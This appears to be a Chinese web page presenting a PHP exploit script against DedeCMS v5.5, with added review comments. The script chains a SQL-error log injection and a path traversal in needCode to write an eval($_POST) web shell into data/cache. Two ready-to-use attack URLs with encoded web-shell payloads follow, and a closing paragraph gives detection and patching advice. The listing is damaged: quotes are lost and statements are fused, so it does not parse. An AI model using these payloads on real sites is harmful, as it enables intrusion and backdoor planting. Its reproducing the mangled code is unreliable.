DedeCms v5.5 漏洞

<?phpprint_r(+—————————————-+dedecms v5.5 final getwebshell exploit+—————————————-+);if ($argc < 3) {print_r(+—————————————-+Usage: php .$argv[0]. host pathhost: target server (ip/hostname)path: path to dedecmsExample:php .$argv[0]. localhost /dedecms/+—————————————-+ );exit;}error_reporting(7);ini_set(max_execution_time, 0);
// NOTE(review): this listing was damaged when the page was extracted. String
// delimiters are missing (the print_r() banners and the ini_set() key are
// unquoted), "<?php" is fused to the first statement, and several statements
// share one line, so it does not parse as PHP as shown.
// The line above prints a banner, exits with the usage text when fewer than two
// command-line arguments are given, sets error_reporting to 7
// (E_ERROR | E_WARNING | E_PARSE) and removes the execution time limit.

$host = $argv[1];$path = $argv[2];
// Host name and DedeCMS base path are taken directly from the command line.

// Three request fragments are defined on the next line:
//   $post_a - query string for plus/digg_ajax.php. The id value is followed by
//             a comment-delimited fputs(fopen(...)) call written as chr() codes;
//             the codes spell the relative path ../data/cache/t.php (the file
//             named in $shell), the mode w+, and a one-line PHP stub that evals
//             the POST field "t".
//   $post_b - needCode value that uses ../ sequences to point at
//             data/mysql_error_trace.
//   $shell  - path of the file the chain is expected to create.
// NOTE(review): the server-side code is not shown here. Presumably the first
// request gets the PHP fragment recorded in data/mysql_error_trace and the
// second makes comments_frame.php load that file; confirm against the DedeCMS
// source.
// Defender view: requests to plus/digg_ajax.php whose id is not a plain integer,
// needCode values containing "../", and new .php files under data/cache are the
// observable traces of this chain. Strict integer validation of id, an
// allow-list for needCode, and denying PHP execution in data/ break it.
$post_a = plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(116).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*;$post_b = needCode=aa/../../../data/mysql_error_trace;$shell = data/cache/t.php;

// Request sequence: the GET built from $post_a, then a POST of $post_b to
// plus/comments_frame.php, then a POST of "t=echo tojen;" to $shell. Only the
// response to the last request is kept, in $content.
get_send($post_a);post_send(plus/comments_frame.php,$post_b);$content = post_send($shell,t=echo tojen;);

// Result check: characters 9-11 of the raw response (the status code in an
// "HTTP/1.1 200" status line) are compared with 200. Only the status code is
// tested; the "tojen" marker sent with the probe is never looked for, so any
// 200 response to the final request is reported as success.
// get_send($url) starts on the same line: it concatenates a GET request for
// $path.$url with fixed Accept, Referer, Accept-Language, Content-Type,
// User-Agent (MSIE 6.00), Host and Connection headers and writes it to a socket
// opened to $host on port 80.
// NOTE(review): the string literals here use typographic quotes, no line
// terminators separate the request line and headers, and "$back = ;" has lost
// its initial value (all likely extraction damage). A failed fsockopen() only
// prints a message; execution continues into fputs() with an invalid handle.
if(substr($content,9,3)==200){ echo “Shell Address is:”.$host.$path.$shell;}else{ echo “Error.”;}function get_send($url){ global $host, $path; $message = “GET “.$path.”$url HTTP/1.1”; $message .= “Accept: */*”; $message .= “Referer: http://$host$path”; $message .= “Accept-Language: zh-cn”; $message .= “Content-Type: application/x-www-form-urlencoded”; $message .= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)”; $message .= “Host: $host”; $message .= “Connection: Close”; $fp = fsockopen($host, 80); if(!$fp){ echo “Connect to host Error”; } fputs($fp, $message); $back = ;

// The next line finishes get_send(): the response is read in 1024-byte chunks
// until EOF, the socket is closed and the whole response is returned.
// post_send($url,$cmd) follows on the same line. It builds the same header set
// for a POST to $path.$url, adds Content-Length: strlen($cmd), appends $cmd as
// the body and sends it to $host on port 80, with the same unchecked
// fsockopen() failure path as get_send().
while (!feof($fp)) $back .= fread($fp, 1024); fclose($fp); return $back; }function post_send($url,$cmd){ global $host, $path; $message = “POST “.$path.”$url HTTP/1.1”; $message .= “Accept: */*”; $message .= “Referer: http://$host$path”; $message .= “Accept-Language: zh-cn”; $message .= “Content-Type: application/x-www-form-urlencoded”; $message .= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)”; $message .= “Host: $host”; $message .= “Content-Length: “.strlen($cmd).””; $message .= “Connection: Close”; $message .= $cmd; $fp = fsockopen($host, 80); if(!$fp){ echo “Connect to host Error”; } fputs($fp, $message); $back = ;

// Tail of post_send(): reads the full response, closes the socket and returns it.
while (!feof($fp)) $back .= fread($fp, 1024); fclose($fp); return $back;}?>

利用方法复制代码http://xxx.com//uploads/plus/digg_frame.php?action=good&id=1024%651024&mid=*/fputs(fopen(base64_decode(ZGF0YS9jYWNoZS9jLnBocA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgPz4));?>

复制代码http://xxx.com/uploads/plus/comments_frame.php?id=2&needCode=/../../../data/mysql_error_trace

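上述两个请求成功后，会在 data/cache 目录下生成 c.php（一句话后门）。排查时应检查 data/cache 下是否出现非预期的 .php 文件，并在访问日志中查找 id 参数不是纯数字的 plus/digg_frame.php 请求，以及 needCode 参数中带有 ../ 的 plus/comments_frame.php 请求；修复措施是升级到已修复该问题的版本，并在 Web 服务器配置中禁止 data/ 目录执行 PHP。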
